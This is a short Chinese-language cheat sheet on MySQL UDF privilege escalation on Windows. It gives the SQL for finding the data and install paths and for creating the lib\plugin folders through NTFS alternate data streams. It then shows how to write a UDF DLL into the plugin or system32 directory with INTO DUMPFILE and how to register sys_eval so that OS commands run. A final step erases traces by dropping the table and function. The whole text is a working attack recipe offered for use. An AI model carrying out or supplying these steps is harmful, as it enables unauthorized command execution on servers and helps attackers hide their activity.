udf提权小结

00x1

首先判断mysql版本，

mysql版本 < 5.2 , UDF导出到系统目录c:/windows/system32/

mysql版本 > 5.2 ，UDF导出到安装路径MySQL\Lib\Plugin\

一般Lib、Plugin文件夹需要手工建立（可用流模式突破进而创建文件夹）

可能会用到的命令:

select @@datadir 路径

select @@version 版本

使用NTFS ADS流创建lib、plugin文件夹：

某些情况下，我们会遇到Can't open shared library的情况，这时就需要我们把udf.dll导出到lib\plugin目录下才可以，但是默认情况下plugin不存在，怎么办？ 还好有大牛研究出了利用NTFS ADS流来创建文件夹的方法
select @@basedir;   //查找mysql的目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //使用NTFS ADS流创建lib目录
select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'; //利用NTFS ADS再次创建plugin目录
执行成功以后再进行导出即可。 

00x2

直接执行

create function sys_eval returns string soname 'udf.dll'

若成功则可直接执行命令。

00x3

mysql版本小于5.1此方法一般不成功，则需要导入dll到系统目录，一般导入到c:\windows\system32\，如果不可写入则试试c:\windows\（一般5.0一下放这）。

00x4

具体语句如下：

create table a (cmd LONGBLOB);

insert into a (cmd) values (hex(load_file('D:\\Program Files\\MySQL\\MySQL Server 5.0\\Lib\\Plugin\\lib_mysqludf_sys.dll'))); 

SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';

create function sys_eval returns string soname 'udf.dll'

select sys_eval('ipconfig');

00x5

擦除痕迹：

drop table a;
drop function sys_eval;

Ps：一定要是root